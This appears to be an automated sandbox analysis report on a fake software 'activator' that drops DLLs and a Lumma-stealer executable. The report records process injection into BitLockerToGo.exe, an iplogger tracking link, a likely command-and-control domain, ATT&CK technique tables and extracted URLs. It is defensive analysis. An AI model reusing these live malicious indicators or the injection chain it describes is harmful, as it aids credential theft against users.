    Source: DragExt64.dll.0.drStatic PE information: section name: .rodata
    Source: DragExt64.dll.0.drStatic PE information: section name: .xdata
    Source: drvstore.dll.0.drStatic PE information: section name: .didat
    Source: dsound.dll.0.drStatic PE information: section name: RT_CODE
    Source: dsound.dll.0.drStatic PE information: section name: .didat
    Source: dsreg.dll.0.drStatic PE information: section name: .didat
    Source: dsuiext.dll.0.drStatic PE information: section name: .didat
    Source: dui70.dll.0.drStatic PE information: section name: .didat
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_00452BB4 push ss; retf 0042h 3_2_00452BB5
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DragExt64.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dpx.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DWrite.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dosvc.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DragExt64.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dpx.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DWrite.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dllJump to dropped file
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dosvc.dllJump to dropped file
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6844 Thread sleep time: -60000s >= -30000s
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F0ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5F0ECE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5EF647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7E5EF647C
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F23130 FindFirstFileExA,0_2_00007FF7E5F23130
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F15134 VirtualQuery,GetSystemInfo,0_2_00007FF7E5F15134
    Source: BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311503934.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: dosvc.dllBinary or memory string: CDeviceProfile::_IsOnVirtualMachine
    Source: n3.exe, 00000002.00000002.2283941481.0000000001CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004474B0 LdrInitializeThunk,3_2_004474B0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F1AC68 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5F1AC68
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F241B0 GetProcessHeap,0_2_00007FF7E5F241B0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F16B24 SetUnhandledExceptionFilter,0_2_00007FF7E5F16B24
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F15CE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7E5F15CE0
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exeCode function: 0_2_00007FF7E5F16940 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7E5F16940

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2665008
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44D000
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 460000
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Code function: 0_2_00007FF7E5F0ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe"
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.com/1KhnJ4
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: dxgi.dll | Binary or memory string: Shell_TrayWnd
    Source: dxgi.dll | Binary or memory string: D3D9_IdHot_Ctrl_SnapDesktopAppOnHMDEnumAdapters failed.App window cloakedLock screen activeShell_TrayWndShell_SecondaryTrayWndSnapped DesktopOccluder wnd ('Code' is HWND):%sD3DKMTGetThunkVersion
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Code function: 0_2_00007FF7E5F28DF0 cpuid
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Code function: 0_2_00007FF7E5F0DE44 GetLocaleInfoW,GetNumberFormatW
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Queries volume information: C:\Windows VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Queries volume information: C:\Windows\AppReadiness VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation
    Source: C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Code function: 0_2_00007FF7E5F1400C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,SleepEx,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn
    Source: C:\Users\user\Desktop\Activator by URKE v2.5.exe | Code function: 0_2_00007FF7E5EF6768 GetVersionExW
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Stealing of Sensitive Information

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: 2 Command and Scripting Interpreter; 1 PowerShell; At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: 1 Exploitation for Privilege Escalation; 312 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: 1 Virtualization/Sandbox Evasion; 312 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading
    Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: 1 System Time Discovery; 121 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 2 File and Directory Discovery; 36 System Information Discovery; Remote System Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: 1 Input Capture; 1 Archive Collected Data; 2 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: 11 Encrypted Channel; 3 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 15 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
    [Figure: behavior graph. ID: 1525047; Sample: Activator by URKE v2.5.exe; Start date: 03/10/2024; Architecture: WINDOWS; Score: 100. Process tree: Activator by URKE v2.5.exe started n3.exe and chrome.exe; n3.exe started BitLockerToGo.exe; chrome.exe started a second chrome.exe process.]

    Source | Detection | Scanner | Label
    Activator by URKE v2.5.exe | 47% | ReversingLabs |

    Source | Detection | Scanner | Label
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DWrite.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\DragExt64.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dosvc.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dpx.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\drvstore.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsac.resources.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsadmin.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsound.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsreg.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dsuiext.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dui70.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\duser.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dwmcore.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxcompiler.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxgi.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\Ux16bit\dxil.dll | 0% | ReversingLabs |
    C:\Users\user\AppData\Local\Temp\RarSFX0\n3.exe | 62% | ReversingLabs | Win32.Spyware.Lummastealer

    No Antivirus matches
                                                                                                              https://cdn.discordapp.com/attachments/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                http://www.ascendercorp.com/typedesigners.htmln3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drfalse
                                                                                                                  unknown
                                                                                                                  https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzolBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLn3.exe.0.drfalse
                                                                                                                      unknown
                                                                                                                      https://discord.com/api/v9/stage-instancesn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://advocachark.store/api9BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://discord.com/api/v9//voice/regionsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://status.discord.com/api/v2/scheduled-maintenances/upcoming.jsonn3.exe, 00000002.00000002.2285591123.0000000002664000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://www.ascendercorp.com/n3.exe, 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe, 00000002.00000000.2127075453.0000000001206000.00000008.00000001.01000000.00000009.sdmp, n3.exe.0.drfalse
                                                                                                                                unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwPBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  https://advocachark.store:443/apippBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    http://khr.io/hlsl2spirv#optimization)dxcompiler.dllfalse
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://discord.com/api/v9/applicationsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://steamcommunity.com/profiles/765BitLockerToGo.exe, 00000003.00000002.2311503934.0000000002A7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                          • URL Reputation: malware
                                                                                                                                          unknown
                                                                                                                                          https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://advocachark.store/RBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AC4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AC4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://cdn.discordapp.com/role-icons/n3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://discord.com/api/v9/n3.exe, 00000002.00000002.2285591123.000000000282A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://login.microsoftonline.com/https://gallery.usgovcloudapi.net/mariadb.database.usgovcloudapi.nn3.exefalse
                                                                                                                                                      unknown
                                                                                                                                                      https://winscp.net/DDragExt64.dllfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
